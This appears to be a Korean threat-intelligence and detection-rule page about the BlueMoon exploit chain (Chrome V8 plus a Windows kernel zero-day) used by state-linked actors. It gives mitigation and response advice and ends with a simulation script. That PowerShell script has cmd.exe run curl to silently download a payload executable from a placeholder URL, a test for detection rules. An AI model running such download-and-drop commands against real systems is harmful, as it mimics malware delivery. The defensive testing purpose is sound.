Chrome 및 Windows 제로데이 취약점, 국가 연계 위협 행위자들에 의해 빠르게 채택됨
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
다수의 스파이 활동 중심 위협 행위자가 Chrome V8 취약성과 Windows 커널 LPE 제로데이를 결합한 BlueMoon 익스플로잇 킷을 채택했습니다. 이 캠페인은 빠른 운영적 채택을 보여주며, AI가 지원하는 익스플로잇 개발을 포함할 수 있습니다. 주로 중국과 연계가 의심되는 여러 행위자가 이 킷을 사용하여 악성 브라우저 확장과 백도어를 포함한 다양한 페이로드를 전달합니다.
조사
Proofpoint는 BlueMoon 킷을 사용하는 네 가지 개별적인 위협 클러스터를 식별하고, 패키징의 차이에도 불구하고 유사한 오케스트레이션과 로딩 기법을 관찰했습니다. 조사는 패치 갭 취약성의 악용과 DLL 사이드로딩 및 악성 브라우저 확장 설치 같은 사후 악용 행위를 강조했습니다. 기술 분석은 또한 광범위한 진단 로깅과 AI 지원 개발을 나타낼 수 있는 마크다운 핸드오버 파일을 발견했습니다.
완화
사용자는 V8 취약성을 해결하기 위해 Chrome 및 기타 Chromium 기반 브라우저를 최신 안정된 릴리스로 업데이트해야 합니다. 조직은 또한 Windows 패치를 우선시하여 커널 LPE 취약점에 대한 노출을 줄여야 합니다. 의심스러운 프로세스 트리, 특히 chrome.exe 에서 스폰되는 cmd.exe or curl.exe를 모니터링하고 비정상적인 이름의 예약 작업을 감사하는 것이 권장됩니다.
대응
BlueMoon 익스플로잇이 탐지되면 추가적인 가로 움직임이나 데이터 유출을 방지하기 위해 영향을 받은 엔드포인트를 즉시 격리해야 합니다. 응답자는 반사적으로 로드된 DLL을 식별하기 위해 메모리 포렌식을 수행하고, 무단 브라우저 확장이 있는지 시스템을 검사해야 합니다. 보안 팀은 또한 영속성 메커니즘을 수색하고, 특히 의심스러운 예약 작업과 CLSID 하위 항목의 레지스트리 수정 사항을 조심해야 합니다.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
의심스러운 CURL 사용 (cmdline을 통해)
공개 사용자 프로필의 의심스러운 파일 (file_event를 통해)
Cloudflare 개발 도메인 남용 가능 (dns를 통해)
IP 조회 도메인 통신 시도 가능성 (dns를 통해)
비정상적인 최상위 도메인(TLD)의 DNS 요청에 의한 의심스러운 Command and Control (dns를 통해)
탐지를 위한 IOCs (HashSha256): 블루문 한 번: Chrome 및 Windows 제로데이를 사용하는 새로운 익스플로잇 체인을 빠르게 채택하는 여러 국가 연계 위협 행위자
탐지를 위한 IOCs (SourceIP): 블루문 한 번: Chrome 및 Windows 제로데이를 사용하는 새로운 익스플로잇 체인을 빠르게 채택하는 여러 국가 연계 위협 행위자
탐지를 위한 IOCs (DestinationIP): 블루문 한 번: Chrome 및 Windows 제로데이를 사용하는 새로운 익스플로잇 체인을 빠르게 채택하는 여러 국가 연계 위협 행위자
Chrome에서 CMD 및 CURL 실행을 통한 BlueMoon 익스플로잇 체인 탐지 [Windows 프로세스 생성]
시뮬레이션 실행
-
공격 내러티브 및 명령어: 적대자는 웹을 탐색하는 사용자를 목표로 합니다. Chrome의 취약점을 악용하여 공격자는 브라우저가 명령 셸을 생성하도록 강제합니다. 영향을 최소화하고 브라우저를 통해 큰 파일을 직접 다운로드하지 않기 위해 공격자는
cmd.exe를 호출하여curl을 사용합니다. 이 명령은 구체적으로-sS -o플래그를 사용하여msgbox.exe라는 페이로드를 원격 서버에서 시뮬레이션하는 BlueMoon 익스플로잇 행동처럼 조용히 다운로드합니다. -
회귀 테스트 스크립트:
# BlueMoon 익스플로잇 체인 시뮬레이션 # 1단계: Chrome이 부모 프로세스인 것처럼 시뮬레이션합니다 (필요하다면 PID/프로세스 트리를 시뮬레이션하기 위해 PowerShell 래퍼를 사용할 것이지만 # 직접 테스트를 위해 커맨드 라인 패턴을 트리거합니다). $SimulatedPayloadUrl = "https://raw.githubusercontent.com/example/payload/main/msgbox.exe" $TargetDir = "$env:TEMPmsgbox.exe" Write-Host "[!] BlueMoon 시뮬레이션 시작..." # 감지가 트리거되도록 하기 위해 Sigma 규칙에 정의된 대로 정확하게 커맨드 라인을 모방해야 합니다. # 참고: 실제 환경에서는 chrome.exe가 부모일 것입니다. # 이 스크립트에서는 규칙이 찾고 있는 명령을 실행합니다. Start-Process "cmd.exe" -ArgumentList "/c curl -sS -o $TargetDir $SimulatedPayloadUrl" -Wait Write-Host "[+] 시뮬레이션 완료. SIEM에서 감지를 확인하세요." -
정리 명령어:
# 시뮬레이션된 페이로드 삭제 Remove-Item -Path "$env:TEMPmsgbox.exe" -ErrorAction SilentlyContinue Write-Host "[+] 정리 완료."